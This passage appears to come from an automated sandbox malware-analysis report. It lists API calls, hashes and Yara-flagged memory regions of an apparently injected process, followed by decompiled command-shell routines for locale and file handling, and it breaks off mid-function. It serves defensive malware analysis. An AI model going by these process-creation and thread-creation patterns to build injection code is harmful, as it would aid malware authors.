                                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 00097378
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 00097378
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000988ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000988ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872DA
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872FB
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00087C83,?), ref: 0008D44B
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BA2
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098984
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098984
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCE0,?,?), ref: 0009743C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098A50
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCE0,?,?), ref: 0009743C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098A50
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00087C83,?), ref: 0008D44B
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      C-Code - Quality: 84%
                                                      			E4A7388D9() {
                                                      				signed int _v8;
                                                      				short _v264;
                                                      				int _v268;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t25;
                                                      				int _t27;
                                                      				int _t35;
                                                      				void* _t59;
                                                      				void* _t60;
                                                      				intOrPtr* _t62;
                                                      				int _t63;
                                                      				signed int _t66;
                                                      				intOrPtr* _t71;
                                                      				intOrPtr _t72;
                                                      				int _t83;
                                                      				void* _t84;
                                                      				signed int _t85;
                                                      
                                                      				_t25 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t25 ^ _t85;
                                                      				_t27 = E4A73756D();
                                                      				_t84 = GetLocaleInfoW;
                                                      				_v268 = _t27;
                                                      				if(GetLocaleInfoW(_t27, 0x1e, 0x4a754950, 8) == 0) {
                                                      					E4A73185A(0x4a754950, 8, E4A744E44);
                                                      				}
                                                      				if(GetLocaleInfoW(_v268, 0x23,  &_v264, 0x80) == 0) {
                                                      					L6:
                                                      					_push(E4A738B24);
                                                      					_t63 = 0x20;
                                                      					_push(_t63);
                                                      					_push(0x4a754bc0);
                                                      					E4A73185A();
                                                      					E4A73185A(0x4a754b80, _t63, E4A738B20);
                                                      					 *0x4a7541d0 =  *0x4a7541d0 & 0x00000000;
                                                      					_t35 = GetLocaleInfoW(_v268, 0x21,  &_v264, 0x80);
                                                      					_t66 = 2;
                                                      					if(_t35 != 0) {
                                                      						_t59 = (_v264 & 0x0000ffff) - 0x30;
                                                      						if(_t59 != 0) {
                                                      							_t60 = _t59 - 1;
                                                      							if(_t60 == 0) {
                                                      								 *0x4a7541d0 = 1;
                                                      								 *0x4a7541cc = L"dd/MM/yy";
                                                      							} else {
                                                      								if(_t60 == 1) {
                                                      									 *0x4a7541d0 = _t66;
                                                      									 *0x4a7541cc = L"yy/MM/dd";
                                                      								}
                                                      							}
                                                      						} else {
                                                      							 *0x4a7541d0 =  *0x4a7541d0 & 0x00000000;
                                                      							 *0x4a7541cc = L"MM/dd/yy";
                                                      						}
                                                      					}
                                                      					 *0x4a7541c8 = _t66;
                                                      					if(GetLocaleInfoW(_v268, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
                                                      						 *0x4a7541c8 = 4;
                                                      					}
                                                      					if(GetLocaleInfoW(_v268, 0x1d, 0x4a754940, 8) == 0) {
                                                      						E4A73185A(0x4a754940, 8, 0x4a74bcb8);
                                                      					}
                                                      					if(GetLocaleInfoW(_v268, 0x31, 0x4a754d80, _t63) == 0) {
                                                      						E4A73185A(0x4a754d80, _t63, "Mon");
                                                      					}
                                                      					if(GetLocaleInfoW(_v268, 0x32, 0x4a754d40, _t63) == 0) {
                                                      						E4A73185A(0x4a754d40, _t63, "Tue");
                                                      					}
                                                      					if(GetLocaleInfoW(_v268, 0x33, 0x4a754d00, _t63) == 0) {
                                                      						E4A73185A(0x4a754d00, _t63, "Wed");
                                                      					}
                                                      					if(GetLocaleInfoW(_v268, 0x34, 0x4a754cc0, _t63) == 0) {
                                                      						E4A73185A(0x4a754cc0, _t63, "Thu");
                                                      					}
                                                      					if(GetLocaleInfoW(_v268, 0x35, 0x4a754c80, _t63) == 0) {
                                                      						E4A73185A(0x4a754c80, _t63, "Fri");
                                                      					}
                                                      					if(GetLocaleInfoW(_v268, 0x36, 0x4a754c40, _t63) == 0) {
                                                      						E4A73185A(0x4a754c40, _t63, "Sat");
                                                      					}
                                                      					if(GetLocaleInfoW(_v268, 0x37, 0x4a754c00, _t63) == 0) {
                                                      						E4A73185A(0x4a754c00, _t63, "Sun");
                                                      					}
                                                      					_t83 = 8;
                                                      					if(GetLocaleInfoW(_v268, 0xe, 0x4a754930, _t83) == 0) {
                                                      						E4A73185A(0x4a754930, _t83, E4A732EC4);
                                                      					}
                                                      					if(GetLocaleInfoW(_v268, 0xf, 0x4a754920, _t83) == 0) {
                                                      						_t56 = E4A73185A(0x4a754920, _t83, E4A744DE0);
                                                      					}
                                                      					__imp__setlocale(".OCP");
                                                      					return E4A7313A9(_t56, 0x4a754920, _v8 ^ _t85, _t72, _t83, _t84, 0);
                                                      				} else {
                                                      					_t71 = 0x4a738b28;
                                                      					_t62 =  &_v264;
                                                      					while(1) {
                                                      						_t72 =  *_t62;
                                                      						if(_t72 !=  *_t71) {
                                                      							break;
                                                      						}
                                                      						if(_t72 == 0) {
                                                      							L27:
                                                      							_t62 = 0;
                                                      							L5:
                                                      							 *0x4a754090 = _t62;
                                                      							goto L6;
                                                      						}
                                                      						_t72 =  *((intOrPtr*)(_t62 + 2));
                                                      						_t24 = _t71 + 2; // 0x90900000
                                                      						if(_t72 !=  *_t24) {
                                                      							break;
                                                      						}
                                                      						_t62 = _t62 + 4;
                                                      						_t71 = _t71 + 4;
                                                      						if(_t72 != 0) {
                                                      							continue;
                                                      						}
                                                      						goto L27;
                                                      					}
                                                      					asm("sbb eax, eax");
                                                      					asm("sbb eax, 0xffffffff");
                                                      					goto L5;
                                                      				}
                                                      			}























                                                      APIs
                                                        • Part of subcall function 4A73756D: GetUserDefaultLCID.KERNEL32(4A7427B1,0000001F,?,00000080), ref: 4A73756D
                                                      • GetLocaleInfoW.KERNEL32(00000000,0000001E,4A754950,00000008,4A755260,?,00000104), ref: 4A73890D
                                                      • GetLocaleInfoW.KERNEL32(?,00000023,?,00000080), ref: 4A73892C
                                                      • GetLocaleInfoW.KERNEL32(?,00000021,?,00000080,4A754B80,00000020,4A738B20,4A754BC0,00000020,4A738B24), ref: 4A73898D
                                                      • GetLocaleInfoW.KERNEL32(?,00000024,?,00000080), ref: 4A7389CD
                                                      • GetLocaleInfoW.KERNEL32(?,0000001D,4A754940,00000008), ref: 4A7389F7
                                                      • GetLocaleInfoW.KERNEL32(?,00000031,4A754D80,00000020), ref: 4A738A10
                                                      • GetLocaleInfoW.KERNEL32(?,00000032,4A754D40,00000020), ref: 4A738A29
                                                      • GetLocaleInfoW.KERNEL32(?,00000033,4A754D00,00000020), ref: 4A738A42
                                                      • GetLocaleInfoW.KERNEL32(?,00000034,4A754CC0,00000020), ref: 4A738A5B
                                                      • GetLocaleInfoW.KERNEL32(?,00000035,4A754C80,00000020), ref: 4A738A74
                                                      • GetLocaleInfoW.KERNEL32(?,00000036,4A754C40,00000020), ref: 4A738A8D
                                                      • GetLocaleInfoW.KERNEL32(?,00000037,4A754C00,00000020), ref: 4A738AA6
                                                      • GetLocaleInfoW.KERNEL32(?,0000000E,4A754930,00000008), ref: 4A738AC2
                                                      • GetLocaleInfoW.KERNEL32(?,0000000F,4A754920,00000008), ref: 4A738ADB
                                                      • setlocale.MSVCRT ref: 4A738AEC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                      • String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed
                                                      • API String ID: 1351325837-1452651164
                                                      • Opcode ID: 99549313aa28f1ad0a84935fe50f5582e66cabe77ce4a5682d5fa2be1e4b304a
                                                      • Instruction ID: b7d9db9a07801c8a77351c78f42d66b3bd5a8ab266afd9105b35bd219426e974
                                                      • Opcode Fuzzy Hash: 99549313aa28f1ad0a84935fe50f5582e66cabe77ce4a5682d5fa2be1e4b304a
                                                      • Instruction Fuzzy Hash: 527129B158C526BAEB701721CC45FEB6E7DEB91B98F020055F641B9182CBB4CE8DDB24
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 57%
                                                      			E4A7439B6(WCHAR* __ecx, unsigned int __edx, WCHAR* _a4) {
                                                      				signed int _v8;
                                                      				void _v522;
                                                      				char _v524;
                                                      				short _v1044;
                                                      				short _v4116;
                                                      				union _LARGE_INTEGER _v4120;
                                                      				int _v4124;
                                                      				long _v4128;
                                                      				int _v4132;
                                                      				long _v4136;
                                                      				void* _v4140;
                                                      				int _v4144;
                                                      				short* _v4148;
                                                      				signed int _v4152;
                                                      				signed int _v4156;
                                                      				int _v4160;
                                                      				char _v4164;
                                                      				signed int _v4168;
                                                      				WCHAR* _v4172;
                                                      				signed int _v4176;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t120;
                                                      				struct %anon52 _t122;
                                                      				WCHAR* _t123;
                                                      				long _t127;
                                                      				struct %anon52 _t129;
                                                      				void* _t131;
                                                      				void* _t135;
                                                      				long _t137;
                                                      				unsigned int _t140;
                                                      				long _t141;
                                                      				signed char* _t142;
                                                      				void* _t146;
                                                      				int _t147;
                                                      				long _t160;
                                                      				long _t162;
                                                      				long _t163;
                                                      				long _t164;
                                                      				long _t165;
                                                      				void* _t174;
                                                      				long _t175;
                                                      				long _t183;
                                                      				WCHAR* _t186;
                                                      				void* _t187;
                                                      				int _t194;
                                                      				long _t201;
                                                      				long _t202;
                                                      				signed int _t203;
                                                      				void* _t211;
                                                      				int _t214;
                                                      				long _t215;
                                                      				signed int _t218;
                                                      				void* _t219;
                                                      				void* _t222;
                                                      
                                                      				_t208 = __edx;
                                                      				_t188 = __ecx;
                                                      				E4A732C26(0x104c);
                                                      				_t120 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t120 ^ _t218;
                                                      				_v4168 = _v4168 | 0xffffffff;
                                                      				_t186 = _a4;
                                                      				_t214 = 0;
                                                      				_t211 = 1;
                                                      				_v4172 = _t186;
                                                      				_v4140 = 0;
                                                      				_v4164 = 0x7fffffff;
                                                      				_v4156 = 0;
                                                      				_v4152 = 0;
                                                      				_v4160 = 1;
                                                      				_t122 = E4A7339EF(_t186, 0);
                                                      				_v4120.LowPart = _t122;
                                                      				if(_t122 == 0xffffffff) {
                                                      					_t123 = E4A73321B(__ecx, L"DPATH");
                                                      					__eflags = _t123;
                                                      					if(_t123 == 0) {
                                                      						L11:
                                                      						__eflags =  *0x4a754128 - 0x7b;
                                                      						if( *0x4a754128 == 0x7b) {
                                                      							 *0x4a754128 = 2;
                                                      						}
                                                      						E4A74056B( *0x4a754128);
                                                      						L14:
                                                      						_t214 = _t211;
                                                      						L7:
                                                      						return E4A7313A9(_t214, _t186, _v8 ^ _t218, _t208, _t211, _t214);
                                                      					}
                                                      					_t188 =  &_v1044;
                                                      					_t127 = SearchPathW(_t123, _t186, 0, 0x104,  &_v1044, 0);
                                                      					__eflags = _t127;
                                                      					if(_t127 == 0) {
                                                      						goto L11;
                                                      					}
                                                      					_t129 = E4A7339EF( &_v1044, 0);
                                                      					_v4120.LowPart = _t129;
                                                      					__eflags = _t129 - 0xffffffff;
                                                      					if(_t129 != 0xffffffff) {
                                                      						goto L1;
                                                      					}
                                                      					goto L11;
                                                      				}
                                                      				L1:
                                                      				_v4148 =  &_v524;
                                                      				_t131 = E4A733B03( &_v524, _t188, _v4120.LowPart);
                                                      				_t186 = __imp___get_osfhandle;
                                                      				if(_t131 == 0) {
                                                      					_t183 = GetFileSize( *_t186( &_v4164), _v4120.LowPart);
                                                      					_v4168 = _t183;
                                                      					SetFilePointer( *_t186(_t214), _v4120.LowPart, _t214, _t214);
                                                      					_v4156 = _t211;
                                                      					_v4152 = _t214;
                                                      				}
                                                      				while(1) {
                                                      					_t222 =  *0x4a7541b4 - _t214; // 0x0
                                                      					if(_t222 != 0) {
                                                      						break;
                                                      					}
                                                      					_t135 =  *_t186(_v4120.LowPart,  &_v524, 0x200,  &_v4124, _t214);
                                                      					_t211 = ReadFile;
                                                      					_pop(_t191);
                                                      					if(ReadFile(_t135, ??, ??, ??, ??) == 0) {
                                                      						L75:
                                                      						_t137 = GetLastError();
                                                      						_push(_t214);
                                                      						 *0x4a754128 = _t137;
                                                      						_push(_t137);
                                                      						L76:
                                                      						E4A736D44(_t191);
                                                      						L6:
                                                      						E4A733AB3(_v4120.LowPart);
                                                      						goto L7;
                                                      					}
                                                      					if(_v4124 != _t214) {
                                                      						__eflags = _v4160 - _t214;
                                                      						if(_v4160 != _t214) {
                                                      							__eflags = _v524 - 0xfeff;
                                                      							_t191 = 0 | _v524 == 0x0000feff;
                                                      							_v4140 = _t191;
                                                      							__eflags = _t191 - _t214;
                                                      							if(_t191 != _t214) {
                                                      								_t35 =  &_v4124;
                                                      								 *_t35 = _v4124 - 2;
                                                      								__eflags =  *_t35;
                                                      								memmove( &_v524,  &_v522, _v4124);
                                                      								_t219 = _t219 + 0xc;
                                                      							}
                                                      						}
                                                      						_t140 = _v4124;
                                                      						_v4144 = _t140;
                                                      						__eflags = _v4140 - _t214;
                                                      						if(_v4140 == _t214) {
                                                      							_t141 = E4A734490(_t140, 1);
                                                      							__eflags = _t141;
                                                      							if(_t141 != 0) {
                                                      								L24:
                                                      								_t194 = _v4124;
                                                      								_t142 =  &_v524;
                                                      								_v4132 = _t194;
                                                      								__eflags = _t194 - _t214;
                                                      								if(_t194 <= _t214) {
                                                      									L31:
                                                      									_v4148 = _t214;
                                                      									_t146 = E4A74E4DC(1,  &_v524,  &_v4144,  &_v4148);
                                                      									__eflags = _t146 - _t214;
                                                      									if(_t146 != _t214) {
                                                      										_t147 = _v4124;
                                                      										L35:
                                                      										_t149 = MultiByteToWideChar( *0x4a7541b8, _t214,  &_v524, _t147,  &_v4116, 0x400);
                                                      										_v4132 = _t149;
                                                      										__eflags = _t149 - _t214;
                                                      										if(_t149 == _t214) {
                                                      											_t149 = 0x400;
                                                      											_v4132 = 0x400;
                                                      										}
                                                      										_t191 =  &_v4116;
                                                      										_v4148 =  &_v4116;
                                                      										goto L38;
                                                      									}
                                                      									_t147 = _v4144;
                                                      									__eflags = _t147 - _t214;
                                                      									if(_t147 != _t214) {
                                                      										goto L35;
                                                      									}
                                                      									goto L6;
                                                      								} else {
                                                      									goto L25;
                                                      								}
                                                      								while(1) {
                                                      									L25:
                                                      									_t203 =  *_t142 & 0x000000ff;
                                                      									__eflags =  *((char*)(_t203 + 0x4a754e40));
                                                      									if( *((char*)(_t203 + 0x4a754e40)) == 0) {
                                                      										goto L27;
                                                      									}
                                                      									L26:
                                                      									_t142 =  &(_t142[1]);
                                                      									_t49 =  &_v4132;
                                                      									 *_t49 = _v4132 - 1;
                                                      									__eflags =  *_t49;
                                                      									if( *_t49 == 0) {
                                                      										_t174 =  *_t186(_v4120.LowPart, _t142, 1,  &_v4132, _t214);
                                                      										_pop(_t191);
                                                      										_t175 = ReadFile(_t174, ??, ??, ??, ??);
                                                      										__eflags = _t175;
                                                      										if(_t175 == 0) {
                                                      											goto L75;
                                                      										}
                                                      										_t55 =  &_v4124;
                                                      										 *_t55 = 1 + _v4124;
                                                      										__eflags =  *_t55;
                                                      										_v4144 = _v4124;
                                                      										goto L31;
                                                      									}
                                                      									L27:
                                                      									_t142 =  &(_t142[1]);
                                                      									_t51 =  &_v4132;
                                                      									 *_t51 = _v4132 - 1;
                                                      									__eflags =  *_t51;
                                                      									if( *_t51 == 0) {
                                                      										goto L31;
                                                      									}
                                                      									L25:
                                                      									_t203 =  *_t142 & 0x000000ff;
                                                      									__eflags =  *((char*)(_t203 + 0x4a754e40));
                                                      									if( *((char*)(_t203 + 0x4a754e40)) == 0) {
                                                      										goto L27;
                                                      									}
                                                      									goto L26;
                                                      								}
                                                      							}
                                                      							__eflags =  *0x4a770668 - _t141; // 0x0
                                                      							if(__eflags != 0) {
                                                      								goto L24;
                                                      							}
